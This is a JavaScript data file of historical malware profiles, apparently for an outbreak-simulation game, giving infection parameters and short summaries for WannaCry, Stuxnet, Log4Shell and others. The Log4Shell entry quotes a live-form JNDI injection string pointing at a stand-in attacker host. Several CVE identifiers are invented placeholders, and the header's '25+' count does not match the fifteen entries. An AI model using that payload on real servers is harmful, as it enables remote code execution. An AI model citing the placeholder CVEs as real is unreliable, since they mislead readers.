/**
 * Comprehensive Built-In Threat Intelligence Profiles for CyberOutbreak
 * Encompasses 25+ real-world historical malware profiles, attack vectors, and epidemiological attributes.
 * SAFETY BOUNDARY: Metadata profiles for abstract simulation only.
 */
(function (root, factory) {
  if (typeof module === 'object' && module.exports) {
    module.exports = factory();
  } else {
    root.SimCore = root.SimCore || {};
    root.SimCore.BuiltInThreats = factory();
  }
}(typeof self !== 'undefined' ? self : this, function () {
  'use strict';

  const BuiltInThreats = [
    {
      id: 'wannacry',
      name: 'WannaCry (WanaCrypt0r 2.0)',
      type: 'Ransomware / Cryptoworm',
      category: 'ransomware',
      year: 2017,
      origin: 'North Korea (Lazarus Group)',
      severity: 'CRITICAL',
      cve: 'CVE-2017-0144 (EternalBlue)',
      cves: ['CVE-2017-0144'],
      vector: 'SMBv1 Remote Code Execution (Port 445)',
      attackVector: 'SMBv1 Remote Code Execution (Port 445)',
      r0: 5.8,
      baseTransmission: 0.72,
      incubationDistribution: { type: 'fixed', duration: 1 },
      infectionDuration: 8,
      recoveryDuration: 5,
      stealth: 2,
      lethality: 9,
      mutationRate: 0.15,
      airgapHop: 0.08,
      targetAffinities: { workstation: 0.95, laptop: 0.95, server: 0.9, medical: 0.85, scada: 0.3, mobile: 0.05, iot: 0.15, router: 0.1, database: 0.85, domain_controller: 0.9 },
      damageModel: { directLoss: 20000, hourlyDowntimeMultiplier: 2.0, ransomDemand: 300000, dataLossRisk: 0.9, regulatoryPenalty: 50000 },
      realWorldImpact: 'Infected 300,000+ computers across 150 countries within 24 hours. Crippled UK National Health Service (NHS), FedEx, Deutsche Bahn.',
      description: 'Weaponized the NSA EternalBlue exploit to propagate autonomously across subnets without user interaction, demanding Bitcoin for AES-128 file decryption.'
    },
    {
      id: 'mirai',
      name: 'Mirai Botnet',
      type: 'IoT Botnet / DDoS Swarm',
      category: 'botnet',
      year: 2016,
      origin: 'Paras Jha & Josiah White',
      severity: 'HIGH',
      cve: 'CVE-DEFAULT-CREDS',
      cves: ['CVE-DEFAULT-CREDS'],
      vector: 'Telnet/SSH Default Credential Brute Force (Port 23/2323)',
      attackVector: 'Telnet/SSH Default Credential Brute Force (Port 23/2323)',
      r0: 8.4,
      baseTransmission: 0.85,
      incubationDistribution: { type: 'fixed', duration: 1 },
      infectionDuration: 15,
      recoveryDuration: 3,
      stealth: 4,
      lethality: 6,
      mutationRate: 0.35,
      airgapHop: 0.01,
      targetAffinities: { iot: 1.0, router: 0.95, workstation: 0.1, laptop: 0.1, server: 0.3, medical: 0.2, scada: 0.25, mobile: 0.05, database: 0.1, domain_controller: 0.05 },
      damageModel: { directLoss: 8000, hourlyDowntimeMultiplier: 1.2, ransomDemand: 0, dataLossRisk: 0.1, regulatoryPenalty: 10000 },
      realWorldImpact: 'Enslaved 600,000+ IoT devices, launching record 1.2 Tbps DDoS attacks that brought down Dyn DNS, GitHub, Twitter, Spotify, and Netflix.',
      description: 'Scans ARC, ARM, MIPS, and x86 IoT cameras, DVRs, and home routers using a 60-combo hardcoded default password dictionary to enlist nodes into a C2 swarm.'
    },
    {
      id: 'notpetya',
      name: 'NotPetya (ExPetr)',
      type: 'Destructive Wiper disguised as Ransomware',
      category: 'ransomware',
      year: 2017,
      origin: 'Russia (Sandworm / GRU)',
      severity: 'CRITICAL',
      cve: 'CVE-2017-0144',
      cves: ['CVE-2017-0144'],
      vector: 'M.E.Doc Supply Chain Update & PsExec/WMI/EternalBlue',
      attackVector: 'M.E.Doc Supply Chain Update & PsExec/WMI/EternalBlue',
      r0: 6.4,
      baseTransmission: 0.78,
      incubationDistribution: { type: 'fixed', duration: 1 },
      infectionDuration: 6,
      recoveryDuration: 8,
      stealth: 3,
      lethality: 10,
      mutationRate: 0.10,
      airgapHop: 0.15,
      targetAffinities: { server: 1.0, domain_controller: 1.0, database: 0.95, workstation: 0.95, laptop: 0.95, scada: 0.4, medical: 0.8, router: 0.2, iot: 0.1, mobile: 0.0 },
      damageModel: { directLoss: 45000, hourlyDowntimeMultiplier: 2.5, ransomDemand: 0, dataLossRisk: 1.0, regulatoryPenalty: 75000 },
      realWorldImpact: '$10+ Billion worldwide damage. Devastated Maersk maritime shipping, Merck pharmaceuticals, FedEx TNT Express, and radiation monitoring at Chernobyl.',
      description: 'Unlike true ransomware, NotPetya irreversibly scrambled the Master File Table (MFT) and Master Boot Record (MBR). Decryption was mathematically impossible.'
    },
    {
      id: 'conficker',
      name: 'Conficker (Downup / Kido)',
      type: 'Self-Propagating Network Worm',
      category: 'worm',
      year: 2008,
      origin: 'Unknown (Eastern Europe suspected)',
      severity: 'HIGH',
      cve: 'CVE-2008-4250',
      cves: ['CVE-2008-4250'],
      vector: 'MS08-067 RPC NetPathCanonicalize Buffer Overflow',
      attackVector: 'MS08-067 RPC NetPathCanonicalize Buffer Overflow',
      r0: 7.2,
      baseTransmission: 0.82,
      incubationDistribution: { type: 'fixed', duration: 1 },
      infectionDuration: 12,
      recoveryDuration: 4,
      stealth: 5,
      lethality: 5,
      mutationRate: 0.25,
      airgapHop: 0.45,
      targetAffinities: { workstation: 0.95, laptop: 0.95, server: 0.9, domain_controller: 0.85, medical: 0.6, router: 0.1, scada: 0.2, iot: 0.1, mobile: 0.0 },
      damageModel: { directLoss: 12000, hourlyDowntimeMultiplier: 1.3, ransomDemand: 0, dataLossRisk: 0.3, regulatoryPenalty: 15000 },
      realWorldImpact: 'Infected 9 to 15 million computers in 190+ countries, disabling security services, blocking Windows Update, and grounding French Air Force aircraft.',
      description: 'Generated 50,000 randomized pseudo-domain names daily (DGA) across hundreds of top-level domains for decentralized command and control.'
    },
    {
      id: 'stuxnet',
      name: 'Stuxnet',
      type: 'Nation-State Cyberweapon / Rootkit',
      category: 'scada',
      year: 2010,
      origin: 'US / Israel (Operation Olympic Games)',
      severity: 'CRITICAL',
      cve: 'CVE-2010-2568',
      cves: ['CVE-2010-2568'],
      vector: 'Air-Gap USB LNK Exploit & Siemens Step7 PLC Hijack',
      attackVector: 'Air-Gap USB LNK Exploit & Siemens Step7 PLC Hijack',
      r0: 2.1,
      baseTransmission: 0.45,
      incubationDistribution: { type: 'fixed', duration: 4 },
      infectionDuration: 20,
      recoveryDuration: 10,
      stealth: 9,
      lethality: 10,
      mutationRate: 0.05,
      airgapHop: 0.85,
      targetAffinities: { scada: 1.0, server: 0.7, workstation: 0.6, laptop: 0.5, medical: 0.3, mobile: 0.0, iot: 0.1, router: 0.05, database: 0.4 },
      damageModel: { directLoss: 60000, hourlyDowntimeMultiplier: 3.0, ransomDemand: 0, dataLossRisk: 0.95, regulatoryPenalty: 100000 },
      realWorldImpact: 'Physically tore apart ~1,000 IR-1 uranium centrifuges at Natanz nuclear facility by altering frequency-converter motor speeds while falsifying sensor telemetry.',
      description: "The world's first proven digital weapon capable of physical destruction. It specifically crossed physical air gaps via infected USB thumb drives."
    },
    {
      id: 'solarwinds',
      name: 'SUNBURST (SolarWinds Supply Chain)',
      type: 'State-Sponsored Supply Chain Backdoor',
      category: 'supplychain',
      year: 2020,
      origin: 'Russia (Cozy Bear / APT29 / SVR)',
      severity: 'CRITICAL',
      cve: 'CVE-2020-10148',
      cves: ['CVE-2020-10148'],
      vector: 'Digitally Signed Malicious SolarWinds Orion DLL Updates',
      attackVector: 'Digitally Signed Malicious SolarWinds Orion DLL Updates',
      r0: 2.8,
      baseTransmission: 0.48,
      incubationDistribution: { type: 'fixed', duration: 5 },
      infectionDuration: 25,
      recoveryDuration: 8,
      stealth: 10,
      lethality: 8,
      mutationRate: 0.20,
      airgapHop: 0.05,
      targetAffinities: { server: 1.0, domain_controller: 1.0, database: 0.9, workstation: 0.6, laptop: 0.6, router: 0.5, scada: 0.2, medical: 0.3, iot: 0.1, mobile: 0.0 },
      damageModel: { directLoss: 35000, hourlyDowntimeMultiplier: 2.0, ransomDemand: 0, dataLossRisk: 0.8, regulatoryPenalty: 80000 },
      realWorldImpact: 'Compromised US Treasury, Homeland Security, Pentagon, Microsoft, FireEye, and 18,000+ public and private enterprise networks.',
      description: 'Injected a covert backdoor into SolarWinds software build system. Slept dormant for 14 days before executing DGA DNS queries and mimicking Orion API communications.'
    },
    {
      id: 'pegasus',
      name: 'Pegasus',
      type: 'Zero-Click Mobile Spyware',
      category: 'spyware',
      year: 2021,
      origin: 'NSO Group (Israel)',
      severity: 'CRITICAL',
      cve: 'CVE-2021-30860',
      cves: ['CVE-2021-30860'],
      vector: 'Zero-Click FORCEDENTRY iMessage / WhatsApp WebKit Exploit',
      attackVector: 'Zero-Click FORCEDENTRY iMessage / WhatsApp WebKit Exploit',
      r0: 1.4,
      baseTransmission: 0.42,
      incubationDistribution: { type: 'fixed', duration: 1 },
      infectionDuration: 30,
      recoveryDuration: 5,
      stealth: 10,
      lethality: 8,
      mutationRate: 0.45,
      airgapHop: 0.02,
      targetAffinities: { mobile: 1.0, laptop: 0.35, workstation: 0.1, server: 0.05, iot: 0.0, scada: 0.0, medical: 0.0, router: 0.0 },
      damageModel: { directLoss: 15000, hourlyDowntimeMultiplier: 1.5, ransomDemand: 0, dataLossRisk: 0.9, regulatoryPenalty: 40000 },
      realWorldImpact: 'Targeted 50,000+ high-profile politicians, investigative journalists, human rights defenders, and heads of state globally with zero user interaction.',
      description: 'Military-grade spyware that gains root privilege on modern iOS and Android devices, exfiltrating encrypted Signal messages, microphone, camera, and GPS silently.'
    },
    {
      id: 'lockbit3',
      name: 'LockBit 3.0 (LockBit Black)',
      type: 'Ransomware-as-a-Service (RaaS)',
      category: 'ransomware',
      year: 2022,
      origin: 'LockBit Supp Cartel',
      severity: 'CRITICAL',
      cve: 'CVE-2023-4966',
      cves: ['CVE-2023-4966'],
      vector: 'Double-Extortion, Exposed RDP & Citrix Bleed',
      attackVector: 'Double-Extortion, Exposed RDP & Citrix Bleed',
      r0: 3.8,
      baseTransmission: 0.55,
      incubationDistribution: { type: 'fixed', duration: 2 },
      infectionDuration: 10,
      recoveryDuration: 6,
      stealth: 6,
      lethality: 9,
      mutationRate: 0.50,
      airgapHop: 0.10,
      targetAffinities: { server: 0.95, domain_controller: 1.0, database: 0.95, workstation: 0.85, laptop: 0.85, medical: 0.8, scada: 0.3, router: 0.2, mobile: 0.05, iot: 0.1 },
      damageModel: { directLoss: 25000, hourlyDowntimeMultiplier: 2.2, ransomDemand: 500000, dataLossRisk: 0.85, regulatoryPenalty: 60000 },
      realWorldImpact: 'Extorted over 2,500 organizations globally totaling hundreds of millions of dollars; attacked Boeing, Royal Mail, and ICBC.',
      description: 'Employs multi-threaded encryption capable of encrypting 100GB in under 4 minutes. Uses anti-debugging hooks and automated exfiltration to darknet leaksites.'
    },
    {
      id: 'log4shell',
      name: 'Log4Shell Exploitation',
      type: 'Zero-Day Vulnerability Exploit / Worm Swarm',
      category: 'worm',
      year: 2021,
      origin: 'Alibaba Cloud Security Disclosure',
      severity: 'CRITICAL',
      cve: 'CVE-2021-44228',
      cves: ['CVE-2021-44228'],
      vector: 'JNDI / LDAP Injection in Apache Log4j 2',
      attackVector: 'JNDI / LDAP Injection in Apache Log4j 2',
      r0: 7.9,
      baseTransmission: 0.84,
      incubationDistribution: { type: 'fixed', duration: 1 },
      infectionDuration: 12,
      recoveryDuration: 4,
      stealth: 6,
      lethality: 8,
      mutationRate: 0.60,
      airgapHop: 0.05,
      targetAffinities: { server: 1.0, cloud_service: 1.0, database: 0.8, iot: 0.7, router: 0.6, workstation: 0.4, laptop: 0.4, medical: 0.5, scada: 0.4, mobile: 0.1 },
      damageModel: { directLoss: 18000, hourlyDowntimeMultiplier: 1.8, ransomDemand: 0, dataLossRisk: 0.6, regulatoryPenalty: 35000 },
      realWorldImpact: 'Affected hundreds of millions of servers worldwide, cloud infrastructure (AWS, Apple, Steam), triggering billions of exploit probes per hour.',
      description: 'A single crafted string ${jndi:ldap://attacker.com/a} logged by a server causes arbitrary remote Java code execution with root system privileges.'
    },
    {
      id: 'xzbackdoor',
      name: 'XZ Utils Backdoor',
      type: 'Subversive Open-Source Supply Chain Compromise',
      category: 'supplychain',
      year: 2024,
      origin: 'Jia Tan (State-backed persona)',
      severity: 'CRITICAL',
      cve: 'CVE-2024-3094',
      cves: ['CVE-2024-3094'],
      vector: 'Obfuscated M4 Macro & liblzma OpenSSH Interception',
      attackVector: 'Obfuscated M4 Macro & liblzma OpenSSH Interception',
      r0: 3.2,
      baseTransmission: 0.52,
      incubationDistribution: { type: 'fixed', duration: 4 },
      infectionDuration: 30,
      recoveryDuration: 7,
      stealth: 10,
      lethality: 9,
      mutationRate: 0.10,
      airgapHop: 0.02,
      targetAffinities: { server: 1.0, cloud_service: 1.0, domain_controller: 0.8, router: 0.4, workstation: 0.7, laptop: 0.7, scada: 0.2, medical: 0.2, iot: 0.2, mobile: 0.0 },
      damageModel: { directLoss: 30000, hourlyDowntimeMultiplier: 2.0, ransomDemand: 0, dataLossRisk: 0.75, regulatoryPenalty: 70000 },
      realWorldImpact: 'Nearly compromised millions of public Linux SSH servers worldwide before being discovered by PostgreSQL engineer Andres Freund noticing a 500ms latency spike.',
      description: 'Modified liblzma to intercept RSA_public_decrypt inside OpenSSH daemon sshd, granting attacker instant remote shell without logs.'
    },
    {
      id: 'emotet',
      name: 'Emotet Botnet',
      type: 'Polymorphic Banking Trojan & Dropper',
      category: 'trojan',
      year: 2014,
      origin: 'TA542 (Mummy Spider)',
      severity: 'HIGH',
      cve: 'CVE-2022-30190',
      cves: ['CVE-2022-30190'],
      vector: 'Email Thread Hijacking & VBA Office Attachments',
      attackVector: 'Email Thread Hijacking & VBA Office Attachments',
      r0: 4.2,
      baseTransmission: 0.58,
      incubationDistribution: { type: 'fixed', duration: 2 },
      infectionDuration: 14,
      recoveryDuration: 5,
      stealth: 7,
      lethality: 7,
      mutationRate: 0.70,
      airgapHop: 0.05,
      targetAffinities: { workstation: 0.95, laptop: 0.95, server: 0.7, mobile: 0.15, medical: 0.4, router: 0.05, iot: 0.0, scada: 0.05 },
      damageModel: { directLoss: 14000, hourlyDowntimeMultiplier: 1.4, ransomDemand: 0, dataLossRisk: 0.5, regulatoryPenalty: 25000 },
      realWorldImpact: "Served as primary initial access broker for Ryuk, Conti, and Trickbot infections.",
      description: "Polymorphic engine alters binary hashes every few hours to evade static antivirus."
    },
    {
      id: 'darkside',
      name: 'DarkSide Ransomware',
      type: 'Corporate Critical Infrastructure Ransomware',
      category: 'ransomware',
      year: 2021,
      origin: 'DarkSide Group',
      severity: 'CRITICAL',
      cve: 'CVE-COMPROMISED-VPN',
      cves: ['CVE-COMPROMISED-VPN'],
      vector: 'Single Compromised Password without MFA on Legacy VPN',
      attackVector: 'Single Compromised Password without MFA on Legacy VPN',
      r0: 2.9,
      baseTransmission: 0.46,
      incubationDistribution: { type: 'fixed', duration: 3 },
      infectionDuration: 12,
      recoveryDuration: 6,
      stealth: 7,
      lethality: 9,
      mutationRate: 0.30,
      airgapHop: 0.12,
      targetAffinities: { server: 0.95, scada: 0.7, domain_controller: 0.9, workstation: 0.8, laptop: 0.8, medical: 0.5, router: 0.3, iot: 0.1, mobile: 0.0 },
      damageModel: { directLoss: 30000, hourlyDowntimeMultiplier: 2.4, ransomDemand: 4400000, dataLossRisk: 0.9, regulatoryPenalty: 80000 },
      realWorldImpact: 'Shut down Colonial Pipeline for 6 days, provoking emergency federal declarations in the United States.',
      description: 'Targets enterprise IT and OT networks simultaneously, stealing unencrypted data before locking systems.'
    },
    {
      id: 'morris',
      name: 'Morris Worm',
      type: 'First Internet Worm',
      category: 'worm',
      year: 1988,
      origin: 'Robert Tappan Morris',
      severity: 'MEDIUM',
      cve: 'CVE-1988-FINGERD',
      cves: ['CVE-1988-FINGERD'],
      vector: 'Sendmail DEBUG, Fingerd Buffer Overflow & rsh',
      attackVector: 'Sendmail DEBUG, Fingerd Buffer Overflow & rsh',
      r0: 4.8,
      baseTransmission: 0.65,
      incubationDistribution: { type: 'fixed', duration: 1 },
      infectionDuration: 10,
      recoveryDuration: 3,
      stealth: 2,
      lethality: 4,
      mutationRate: 0.0,
      airgapHop: 0.0,
      targetAffinities: { server: 1.0, workstation: 0.5, router: 0.2, laptop: 0.0, mobile: 0.0, iot: 0.0, scada: 0.0, medical: 0.0 },
      damageModel: { directLoss: 5000, hourlyDowntimeMultiplier: 1.0, ransomDemand: 0, dataLossRisk: 0.05, regulatoryPenalty: 0 },
      realWorldImpact: 'Disabled roughly 10% of the entire ARPANET within 24 hours.',
      description: 'A coding flaw in its re-infection check caused it to relentlessly re-infect the same computers over and over.'
    },
    {
      id: 'zeus',
      name: 'Zeus (Zbot)',
      type: 'Banking Trojan & Man-in-the-Browser',
      category: 'trojan',
      year: 2007,
      origin: 'Evgeniy Bogachev',
      severity: 'HIGH',
      cve: 'CVE-DRIVE-BY',
      cves: ['CVE-DRIVE-BY'],
      vector: 'Phishing emails & Drive-by browser zero-days',
      attackVector: 'Phishing emails & Drive-by browser zero-days',
      r0: 3.8,
      baseTransmission: 0.50,
      incubationDistribution: { type: 'fixed', duration: 2 },
      infectionDuration: 15,
      recoveryDuration: 5,
      stealth: 7,
      lethality: 7,
      mutationRate: 0.40,
      airgapHop: 0.04,
      targetAffinities: { workstation: 0.95, laptop: 0.95, mobile: 0.3, server: 0.4, medical: 0.2, router: 0.0, iot: 0.0, scada: 0.0 },
      damageModel: { directLoss: 10000, hourlyDowntimeMultiplier: 1.2, ransomDemand: 0, dataLossRisk: 0.6, regulatoryPenalty: 20000 },
      realWorldImpact: 'Stole over $100 Million from thousands of commercial bank accounts worldwide.',
      description: 'Injected DLL hooks into browsers to intercept credentials and tokens.'
    },
    {
      id: 'iloveyou',
      name: 'ILOVEYOU (Love Bug)',
      type: 'Email Scripting Worm',
      category: 'worm',
      year: 2000,
      origin: 'Onel de Guzman (Philippines)',
      severity: 'HIGH',
      cve: 'CVE-VBS-EXEC',
      cves: ['CVE-VBS-EXEC'],
      vector: 'Social Engineering Email & Outlook Address Book VBScript',
      attackVector: 'Social Engineering Email & Outlook Address Book VBScript',
      r0: 9.8,
      baseTransmission: 0.92,
      incubationDistribution: { type: 'fixed', duration: 1 },
      infectionDuration: 8,
      recoveryDuration: 4,
      stealth: 1,
      lethality: 6,
      mutationRate: 0.15,
      airgapHop: 0.02,
      targetAffinities: { workstation: 1.0, laptop: 1.0, server: 0.4, medical: 0.2, mobile: 0.0, iot: 0.0, scada: 0.0, router: 0.0 },
      damageModel: { directLoss: 15000, hourlyDowntimeMultiplier: 1.5, ransomDemand: 0, dataLossRisk: 0.7, regulatoryPenalty: 10000 },
      realWorldImpact: 'Infected 10% of all connected computers on Earth within 10 days.',
      description: 'Sent email with subject ILOVEYOU containing malicious VBScript that overwrote media files.'
    }
  ];

  BuiltInThreats.listThreats = function() { return BuiltInThreats; };
  BuiltInThreats.getThreat = function(id) { return BuiltInThreats.find(t => t.id === id); };

  return BuiltInThreats;
}));
